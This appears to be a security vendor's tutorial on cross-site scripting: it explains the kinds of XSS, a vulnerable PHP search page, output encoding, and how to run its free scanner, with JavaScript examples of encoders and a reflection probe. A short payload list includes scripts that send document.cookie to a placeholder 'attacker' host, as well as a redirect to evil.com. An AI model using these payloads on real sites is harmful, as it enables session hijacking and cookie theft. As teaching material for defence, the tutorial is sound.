How To Test XSS Online and Free

Security For Everyone

In this post, we show how to use Generic XSS Scanner, a free, browser-based tool for detecting cross-site scripting (XSS) vulnerabilities.

Before we get into how to use our free XSS scanning tools, let’s quickly refresh our memories.


What is XSS?

XSS (Cross-Site Scripting) is a class of web application vulnerability that allows an attacker to inject script into web pages viewed by other users. A successful attack can steal cookies, hijack user sessions, or redirect the user to malicious sites.

Exploiting XSS has two halves: the attacker gets malicious JavaScript into a page served by the application, and the victim's browser then executes that JavaScript in the origin of the vulnerable site.

What is the Risk of XSS?

XSS is one of the most common web application security risks. It can be used to:

  • Hijack user sessions
  • Steal cookies
  • Deface websites
  • Redirect users to malicious sites
  • Deliver malware to the victim, for example by loading a malicious download or exploit page from the trusted site

What are the types of XSS?

There are three types of XSS vulnerabilities:

Reflected XSS – The malicious code is not stored on the web server. It is sent in an HTTP request and reflected off the web server, such as in an error message, search result, or any response that includes user input.

Stored XSS – The malicious code is permanently stored on the server, such as in a database, and displayed to users when they request a page.

DOM-based XSS – The payload never has to reach the server. Client-side JavaScript reads attacker-controlled data from a source such as location.hash, location.search or document.referrer and writes it into a dangerous sink such as innerHTML, document.write or eval, so the browser executes it. Because the server response is unchanged, server-side scanning and server-side encoding do not catch this variant; the fix lives in the client-side code.

Sample Code For XSS Vulnerability

Suppose we have a blog app at example.com with a search bar for finding posts. When a user searches, we show the message “Results for {searched_terms}” followed by the blog posts containing those terms.

The basic code would look like this:

Search bar code (a GET form that sends the term in the query string):

<form method="get" action="/search">
  <input type="text" name="term">
</form>

Result page code:

<!-- Result header -->
<h1>Results for <?php echo $_GET['term']; ?></h1>

<!-- Loop for blog post results -->

If a user searches for the term “security”, the page looks like this.

URL: example.com/search?term=security

Result Header: Results For security

Everyone who visits the URL example.com/search?term=security sees the same page. Is everything alright? There isn't a problem, is there? What if a user searches for something like this: <b>bold</b>

URL: example.com/search?term=<b>bold</b>

Result Header: Results For bold (with “bold” rendered in boldface)

The <b> tags in the search term are interpreted as HTML when the browser renders the result page, because the PHP code echoes the term into the page unchanged. The same is true of any other HTML or JavaScript the term contains.

From an attacker’s perspective, how can this be beneficial? What if we search for : <script>window.location="https://www.evil.com"</script>

URL: example.com/search?term=<script>window.location="https://www.evil.com"</script>

Result Header: Results For

If you visit the URL, you are redirected to evil.com without any notification, because the injected script is part of the page and the browser executes it. The header shows only “Results For” because the script element renders no visible text.

Here are some other XSS attack payloads:

  • Steal cookies: <script>img=new Image();img.src="http://attacker/"+document.cookie;</script>
  • Another payload to steal cookies: <script>document.write("<iframe src='http://attacker/cookiegrabber.php?c=" + document.cookie + "'></iframe>");</script>
  • Display a popup box (the usual proof of concept): <script>alert('xss');</script>

Fixing XSS Vulnerability

There are two main defenses against XSS:

Input Validation: Accept only input that matches what the field is supposed to contain. This can be done with blacklisting or whitelisting. Validation alone is not a complete fix, because legitimate input (a search for <b>, a name containing an apostrophe) often must contain the very characters an attacker needs, but applied correctly it reduces the attack surface.

  • Blacklisting – Identify and remove dangerous characters or patterns from user input. The problem is that it is difficult to anticipate every way an attacker might encode or restructure a payload, so blacklists are routinely bypassed.
  • Whitelisting – Allow only known-good characters or formats (digits for a page number, a fixed set of values for a sort order). This is more effective, but it is hard to apply to free-text fields such as a search term.

Output Encoding: When writing user input into a page, encode it so that the browser treats it as data rather than as markup or code. This is the primary defense, and it must be applied at every point where untrusted data is written into the response. The correct encoding depends on where the data lands:

  • HTML body (our “Results for …” header): HTML entity encoding, so that < becomes &lt; and so on.
  • HTML attribute value: attribute encoding, and always inside a quoted attribute, because in an unquoted attribute a space is enough to start a new attribute such as onmouseover.
  • Inside JavaScript code: JavaScript string escaping (\xHH form), or better, avoid placing user data in script at all and read it from a data attribute or a JSON block instead.

Using the wrong encoder for a context, or one encoder for every context, is a common reason an “encoded” page is still exploitable.
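The three contexts side by side, as an added example written for this post rather than code from the original page: it renders the example.com search header from above in three ways (the raw echo, HTML entity encoding used everywhere, and one encoder per context) and shows which payloads each one stops. The page template with an attribute and a script variable, the helper names, and the attribute-breakout payload are assumptions made here; the redirect payload is the one from the post.

```javascript
// Added example, not code from the original post: context-specific output
// encoding for the example.com search page that echoes the "term" parameter.
// Page template, helper names and the second payload are assumptions.

// Encoder for text placed in the HTML body, e.g. <h1>Results for ...</h1>
function encodeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Encoder for text placed inside an HTML attribute value. Everything that is
// not alphanumeric becomes a numeric entity, so neither quote character,
// whitespace nor "<" can end the attribute or start a new one.
function encodeHtmlAttribute(value) {
  return String(value).replace(/[^A-Za-z0-9]/g,
    (ch) => `&#x${ch.charCodeAt(0).toString(16)};`);
}

// Encoder for text placed inside a JavaScript string literal in a <script>
// block: \xHH / \uHHHH escapes, so quotes, backslashes, newlines and the
// "</script>" sequence cannot terminate the literal or the script element.
function encodeJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? `\\x${code.toString(16).padStart(2, "0")}`
      : `\\u${code.toString(16).padStart(4, "0")}`;
  });
}

// The search page writes the term into three contexts: the HTML body, an
// attribute that refills the search box, and a script variable.

// 1. The vulnerable page from the post: the raw term everywhere.
function renderVulnerable(term) {
  return [
    `<h1>Results for ${term}</h1>`,
    `<input type="text" name="term" value=${term}>`,
    `<script>var lastSearch = "${term}";</script>`,
  ].join("\n");
}

// 2. A common half-fix: HTML entity encoding everywhere, attribute left
//    unquoted. Stops <script> injection but not attribute injection.
function renderOneEncoder(term) {
  const encoded = encodeHtml(term);
  return [
    `<h1>Results for ${encoded}</h1>`,
    `<input type="text" name="term" value=${encoded}>`,
    `<script>var lastSearch = "${encoded}";</script>`,
  ].join("\n");
}

// 3. Hardened: one encoder per context, attribute always quoted.
function renderHardened(term) {
  return [
    `<h1>Results for ${encodeHtml(term)}</h1>`,
    `<input type="text" name="term" value="${encodeHtmlAttribute(term)}">`,
    `<script>var lastSearch = "${encodeJsString(term)}";</script>`,
  ].join("\n");
}

// Crude checks used only to compare the three renderings. The template has
// exactly one <script> tag of its own, so any additional one, or any on*=
// handler inside a tag, came from the term.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}
function hasInjectedHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// The redirect payload from the post, and a constructed attribute-breakout
// payload that contains no "<" and no quotes at all.
const REDIRECT_PAYLOAD = '<script>window.location="https://www.evil.com"</script>';
const HANDLER_PAYLOAD = "x onmouseover=alert(1)";

for (const [name, render] of Object.entries({ renderVulnerable, renderOneEncoder, renderHardened })) {
  console.log(name,
    "| script tags:", countScriptTags(render(REDIRECT_PAYLOAD)),
    "| injected handler:", hasInjectedHandler(render(HANDLER_PAYLOAD)));
}
```

Run it with node: the raw page ends up with several script tags, the one-encoder page has only the legitimate one but still gains an onmouseover handler from a payload that never uses < or a quote, and the hardened page resists both. The checks are deliberately crude string matches for comparison only; they are not a safe way to decide that a page is free of XSS.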

How to Use Generic XSS Scanner: Test XSS Online

We will use the free, online Generic XSS Scanner. No technical knowledge is needed for a basic scan; you only click a few buttons. If you are an expert, there are several settings and parameters you can adjust before scanning.

Simplest Way: Use Single Scan

The fast scan is a great way to use a free and online generic XSS scanner. You need to click one button only. Just enter any URL you want to scan and click the ‘Start Scan’ button.

[Screenshot: the Generic XSS Scanner single-scan interface, with the URL field and the ‘Start Scan’ button]

But it has some limitations:

  • The fast scan tests only the parameters present in the query string of the URL you enter, sent with the HTTP GET method.
  • To scan the parameters of a form on the page (such as a login form), use the HTML form parser.
  • If the application accepts data through other HTTP methods (for example POST, PUT, or DELETE), use expert mode.
  • If the page you want to scan requires authentication, use expert mode and add the necessary authentication header.
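What the fast scan's query-string check amounts to, as an added example written here (not the scanner's own code): every parameter in the URL is replaced in turn by a unique canary wrapped in the characters that matter for HTML injection, the page is fetched, and the way the canary comes back decides the verdict. To run offline, the HTTP layer is a fetch-like function, and two constructed stand-ins replace the example.com search page: one that echoes the term raw, like the PHP above, and one that HTML-encodes it. The function names, the verdict labels and the second parameter in the URL are assumptions.

```javascript
// Added example, not the scanner's own code: the check behind a reflected
// XSS "fast scan" of the query string. The HTTP layer is replaced by a
// fetch-like function (url -> response body) so the probe runs offline
// against two constructed stand-ins for the example.com search page.

// Minimal HTML entity encoding, the equivalent of PHP's htmlspecialchars.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g,
    (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" })[c]);
}

// Stand-in for the post's vulnerable result page: echo $_GET['term'] unencoded.
function searchPageVulnerable(url) {
  const term = new URL(url).searchParams.get("term") || "";
  return `<html><body><h1>Results for ${term}</h1></body></html>`;
}

// Stand-in for the fixed page: the term is HTML-encoded before output.
function searchPageHardened(url) {
  const term = new URL(url).searchParams.get("term") || "";
  return `<html><body><h1>Results for ${escapeHtml(term)}</h1></body></html>`;
}

// Probe every query-string parameter of targetUrl once. Each parameter gets
// a unique marker wrapped in the characters that matter for HTML injection;
// how the marker comes back decides the verdict:
//   "vulnerable"        raw canary is in the response, so "<" and quotes survived
//   "reflected-encoded" marker present, but the special characters did not survive
//   "not-reflected"     marker absent, this parameter is not echoed on the page
function probeReflectedXss(targetUrl, fetchFn) {
  const base = new URL(targetUrl);
  const findings = [];
  for (const param of new Set(base.searchParams.keys())) {
    const marker = `xss${findings.length}${param}`;
    const canary = `<${marker}>"'`;
    const probe = new URL(base);
    probe.searchParams.set(param, canary); // URL-encodes < > " ' for transport
    const body = fetchFn(probe.toString());
    let verdict;
    if (body.includes(canary)) verdict = "vulnerable";
    else if (body.includes(marker)) verdict = "reflected-encoded";
    else verdict = "not-reflected";
    findings.push({ param, url: probe.toString(), verdict });
  }
  return findings;
}

// Constructed target URL: "term" is echoed by the page, "page" is not.
const TARGET = "https://example.com/search?term=security&page=1";
console.log(probeReflectedXss(TARGET, searchPageVulnerable));
console.log(probeReflectedXss(TARGET, searchPageHardened));
```

Against the raw page the term parameter is reported vulnerable and the page parameter not reflected; against the encoded page the term comes back reflected-encoded. Two caveats a practitioner should keep in mind: this verdict is only meaningful for the HTML body context (a page that encodes angle brackets but reflects into an unquoted attribute or a script block is still exploitable and would be reported as encoded here), and the request builder is what changes for the expert-mode cases (POST bodies, custom headers), not the reflection check itself.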

Second Way: Advanced Scan for Custom HTTP Requests

Our advanced scanning feature enables you to thoroughly test web applications by allowing full customization of HTTP requests. Whether you’re analyzing form parameters, exploring different HTTP methods, or including authentication headers, this mode provides the flexibility and control you need.

Here’s how to use it effectively:

  • Automated Form Parameter Scanning:
    If your target URL includes forms (such as login or search forms), our scanner automatically detects and parses these forms. Simply enter the URL into the input field, and the system will analyze and include form parameters in the scan process.
  • Flexible HTTP Method Selection:
    Choose from HTTP methods such as GET, POST, PUT, or DELETE to tailor your scan to the application’s behavior. This flexibility ensures you can test parameters and vulnerabilities that require specific methods.
  • Custom Headers and Request Bodies:
    Include custom headers (e.g., authentication tokens) and define a request body as needed. This feature is especially useful for applications requiring authentication or complex input formats.

The advanced scan gives you the request-level control needed to reach parameters the fast scan cannot: form fields, non-GET methods, and pages behind authentication.

[Screenshot: Expert Mode configuration, with HTTP version selection, URL input, HTTP method, custom headers, and a request body field]

Results

Scan results are presented in three ways:

[Screenshot: compact result showing the word ‘Vulnerable’]

  • Compact: a one-word verdict, vulnerable or not.
  • Detail: additional information such as the affected parameters and the vulnerability type.
  • Video: a recording of the whole scan, showing the commands used, their output, and the vulnerability types found.

You can export the results as PDF, HTML, or CSV.

If you need any help, please do not hesitate to contact us via support page.

Happy and secure days for all!
